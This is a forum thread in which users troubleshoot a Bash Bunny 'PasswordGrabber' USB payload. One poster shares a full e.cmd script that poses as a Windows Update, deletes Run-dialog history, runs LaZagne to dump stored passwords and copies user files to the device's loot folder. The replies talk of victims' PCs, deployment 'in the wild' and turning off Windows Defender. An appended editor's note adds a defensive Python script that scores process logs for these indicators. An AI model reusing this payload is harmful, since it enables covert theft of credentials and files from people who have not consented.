Cech

Need help with PasswordGrabber


Hey guys,

My Bash Bunny just arrived! But there is one problem: I've tried some payloads and all of them worked fine, but I had a problem with PasswordGrabber. There are a few scripts in different documents, so could anyone tell me how to set it up on the Bash Bunny?

https://github.com/hak5/bashbunny-payloads/pull/67

This is the script, but I don't really get how to put it on the Bash Bunny. Thank you in advance!


1) If you have not yet, update the Bunny; if you have, ignore this. This is just the common first answer you will get and has been the answer to many questions.

2) This payload needs an external project added, the LaZagne project, in its compiled version for Windows, and it has to be in the switch folder with payload.txt.

The compiled version is on the project's site too, or you can follow the LaZagne project's directions to do your own compiling.


I did everything, but nothing seems to work :/

(d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md) These are the files added to the switch folder, but once I plug it in I get empty directories. Also, my firmware is 1.4.


Hello RazerBlade, first of all thank you for your answer. But, since I'm a bit new to this, would you please explain to me which file goes where? Which file should go in the switch folder and which file should go somewhere else?

It's probably easy to understand for you professionals, but not for regular people like me :)


I don't remember the e and d files being exes. They were cmd files.

Try this. If you got lazagne.exe, then copy it to the machine and run it. According to the command file, the command below should display output on the screen.

lazagne.exe all -v

If you get something, then we know LaZagne works. Next, with the Bash Bunny in arming mode, run the command again but add " > driveletterofBB:\loot\lazagnetest.txt", where driveletterofBB is the current drive letter of the Bash Bunny. We are just testing here to make sure everything works piece by piece.


Whenever I open laZagne.exe (directly or through cmd) I get the following error and the program closes within a second.

lazaGne.exe: error: too few arguments


In the Explorer window, shift+right click and open PowerShell/cmd at that location, then

./laZagne.exe all -v

should do it :wink:


Ok, it works, it found all my passwords, but how do I place it in switch2 so that when I plug the Bash Bunny into the victim's PC the script starts attacking and saves all the passwords in the loot folder instead of making empty directories?

Edited by Cech


The *'s are 'wildcards'; you can replace them with the desired target names or change the file extension (.doc) to whatever you want. :grin:


It could be Windows Defender blocking LaZagne from working; it was the only thing I found that would give me an empty password.txt if it was active during the scan. It also auto-deletes hack tools or quarantines them automatically when active, so I always shut it off before arming my Bunny.


Do I need to configure something in these files, or do I just need to place them in the "Switch2" directory along with the laZagne.exe file?

If there is any configuration required for the following files, can you please help me sort these things out?

d.cmd

e.cmd

i.vbs

payload.txt

readme.md


Configure the xcopy command in e.cmd to whatever you're trying to grab. I also found that if I have set up internet sharing with the Bunny it won't dump files, but it still grabs passwords with LaZagne. If you have sharing turned on in your main network card, turn it off when testing the payload. laZagne.exe/i.vbs/e.cmd/d.cmd/payload.txt should all be in the same switch (1/2) folder so they can be used together.

*Also use Notepad++, not Notepad, because it works better.

Edited by D31M0Z


The link you provided doesn't work since it's a local file, not an internet file, lol, but here is my e.cmd for txt files:

@echo off
@echo Installing Windows Update
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
setlocal

REM Below uses the laZagne.exe in your switch folder

cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

REM Below runs xcopy to grab files specified by location and file extension (the one below grabs simple .txt documents).
REM Try making a txt document on your desktop labeled target.txt, then run the payload to see if it grabs it.

set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul)

REM The line below spams caps lock to tell you that the payload is done and the files are copied (if you have a caps lock LED on your keyboard it should blink when the payload finishes).

start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit


Edited by D31M0Z


First I had to make a few changes because I had an error in the previous one saying that "gwin" does not exist (or something like that), so I've added the following code:

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates a directory composed of computer name, date and time
REM %~dp0 = drive and path of this batch file. %COMPUTERNAME%, %date% and %time% are pretty obvious

The script ran smoothly, but then the PowerShell window appeared and closed. I thought everything was perfect until I got to the last step of opening the loot directory. The loot directory is empty again..


The only line I change when coming from a fresh payload copy is:

The *'s are wildcards, so the xcopy will search any directories or names in the user profile containing txt files.

The /C /Q /G /Y are explained below the xcopy command; /S makes sure it doesn't grab empty folders.

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.doc %dst% >>nul
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to a destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)

4 minutes ago, Cech said:

First I had to make a few changes because I had an error in the previous one saying that "gwin" does not exist (or something like that), so I've added the following code:

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates a directory composed of computer name, date and time
REM %~dp0 = drive and path of this batch file. %COMPUTERNAME%, %date% and %time% are pretty obvious

The script ran smoothly, but then the PowerShell window appeared and closed. I thought everything was perfect until I got to the last step of opening the loot directory. The loot directory is empty again..

The PowerShell window opening then closing is the first line; everything else needs to load, so don't prematurely pull the Bunny.

Wait for that caps lock to blink for the okay from the Bunny itself.

The loot folder should contain a directory labeled with the victim, then a txt file containing the LaZagne scan.

For example, if I were to deploy this in the wild, I would make sure it can be inserted and left for at least 5-10 min, to make sure the xcopy command finishes and exits so I don't miss anything.

It doesn't need to be 5-10 min (it only needs to hit the last line where it flashes caps lock), but it gives me a time frame to wait on, then come back to it and pull.

Edited by D31M0Z


This is kind of strange.. I copied all your files and when I plugged in the USB I got the notepad with all the usernames and passwords, so I was like... wow, let's try it out again. The second time I put the USB in (I was waiting for the caps lock to finish blinking), I got empty directories again...

I was like, let's try once more, maybe I did something wrong. I placed the USB in my computer and again, empty directories..


@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates a directory composed of computer name, date and time
REM %~dp0 = drive and path of this batch file. %COMPUTERNAME%, %date% and %time% are pretty obvious

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date are also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to a destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.

REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul

REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit


Above is a direct copy of my e.cmd; e.cmd is the only file I ever edit on this payload.

**Try running it and, before pulling the Bash Bunny, try to 'eject' it from Windows. If Windows gives you an error message saying it's busy, then xcopy is still running, so you need to wait.**

**The BB is fast, but you still need to give it time for some payloads, especially exfiltration payloads.**

**Just think about how long it takes you to move pictures or docs onto a normal flash drive; the BB does have a great transfer rate though lol**

Edited by D31M0Z

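Editor's note, added to this thread and not part of the payload or of any post above: seen from the defender's side, the e.cmd discussed here leaves a distinctive trail in process-creation logs: a reg.exe delete of the Explorer RunMRU key, a binary and a .cmd script started from the Bunny's mass-storage drive by cmd.exe/wscript.exe, an xcopy from the user profile to that drive, and a hidden PowerShell window. The Python below scores a set of constructed Sysmon-style records (field names as in Event ID 1; the host, user, drive letter D: and paths are made up for the example) against those indicators. It assumes the set of removable drive letters is known to the analyst; in practice that would come from the USB-storage/PnP events or a drive-type lookup, which the script does not do.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records (field names follow Sysmon Event ID 1;
# the host, user, paths and drive letter are made up for this example).
SAMPLE_LOG = r'''
Image="C:\Windows\System32\cmd.exe" CommandLine="cmd.exe /c D:\payloads\switch2\e.cmd" ParentImage="C:\Windows\System32\wscript.exe"
Image="C:\Windows\System32\reg.exe" CommandLine="REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f" ParentImage="C:\Windows\System32\cmd.exe"
Image="D:\payloads\switch2\laZagne.exe" CommandLine="D:\payloads\switch2\laZagne.exe all" ParentImage="C:\Windows\System32\cmd.exe"
Image="C:\Windows\System32\xcopy.exe" CommandLine="xcopy /C /Q /G /Y /S C:\Users\alice\*\*.txt D:\loot\USB_Exfiltration\PC01_20180102_101500" ParentImage="C:\Windows\System32\cmd.exe"
Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -nologo -WindowStyle Hidden -sta -command $wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}')" ParentImage="C:\Windows\System32\cmd.exe"
Image="C:\Windows\System32\xcopy.exe" CommandLine="xcopy /S C:\Users\alice\Documents\report.docx C:\Backup\" ParentImage="C:\Windows\explorer.exe"
Image="C:\Program Files\Git\cmd\git.exe" CommandLine="git status" ParentImage="C:\Windows\System32\cmd.exe"
'''

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
RUNMRU_RE = re.compile(r"\\Explorer\\RunMRU\b", re.IGNORECASE)
USERPROFILE_RE = re.compile(r"^[A-Za-z]:\\Users\\", re.IGNORECASE)
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
SCRIPT_EXT = (".cmd", ".bat", ".vbs", ".ps1")


@dataclass
class ProcEvent:
    image: str          # full path of the started executable
    command_line: str
    parent_image: str


@dataclass
class Finding:
    rule: str
    weight: int         # rough confidence that this is the exfiltration pattern
    image: str
    detail: str


def parse_event(line):
    """Turn one key="value" record into a ProcEvent (missing fields become '')."""
    fields = dict(FIELD_RE.findall(line))
    return ProcEvent(fields.get("Image", ""), fields.get("CommandLine", ""),
                     fields.get("ParentImage", ""))


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def paths_in(cmdline):
    """Whitespace-split tokens that look like absolute Windows paths."""
    return [t.strip('"') for t in cmdline.split() if ":\\" in t]


def on_removable(path, removable_drives):
    # Assumption: the analyst supplies the set of removable drive letters.
    return len(path) >= 2 and path[1] == ":" and path[0].upper() in removable_drives


def analyze(events, removable_drives):
    drives = {d.upper() for d in removable_drives}
    findings = []
    for ev in events:
        img = basename(ev.image)
        cl = ev.command_line
        low = cl.lower()
        paths = paths_in(cl)
        # 1. Anti-forensics: the payload clears the Run-dialog history.
        if img == "reg.exe" and "delete" in low and RUNMRU_RE.search(cl):
            findings.append(Finding("runmru_cleared", 3, ev.image, cl))
        # 2. A binary started from removable media by a script host, or a
        #    script on removable media handed to cmd/wscript.
        launched = on_removable(ev.image, drives) and basename(ev.parent_image) in SCRIPT_HOSTS
        scripted = any(on_removable(p, drives) and p.lower().endswith(SCRIPT_EXT) for p in paths)
        if launched or scripted:
            findings.append(Finding("removable_launch", 2, ev.image, cl))
        # 3. xcopy whose source is under a user profile and whose destination
        #    is the removable drive (the bulk-file grab in e.cmd).
        if img == "xcopy.exe" and len(paths) >= 2:
            src, dst = paths[0], paths[-1]
            if USERPROFILE_RE.match(src) and on_removable(dst, drives):
                findings.append(Finding("profile_to_removable_copy", 3, ev.image, f"{src} -> {dst}"))
        # 4. Hidden PowerShell window (the caps-lock "done" signal); weak alone.
        if img == "powershell.exe" and "-windowstyle hidden" in low:
            findings.append(Finding("hidden_powershell", 1, ev.image, cl))
    return findings


def risk_score(findings):
    return sum(f.weight for f in findings)


if __name__ == "__main__":
    evs = [parse_event(l) for l in SAMPLE_LOG.strip().splitlines()]
    fs = analyze(evs, {"D"})
    for f in fs:
        print(f"[{f.rule}] {f.image}: {f.detail}")
    print("risk score:", risk_score(fs))
```

On the sample records the five lines produced by the payload fire, the user's own xcopy to C:\Backup and the git call do not, and the RunMRU deletion still fires even when no removable drive letter is known, which is why it makes a good stand-alone alert. Defender blocking LaZagne (as noted earlier in the thread) would remove the laZagne.exe event but not the reg.exe or xcopy ones.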
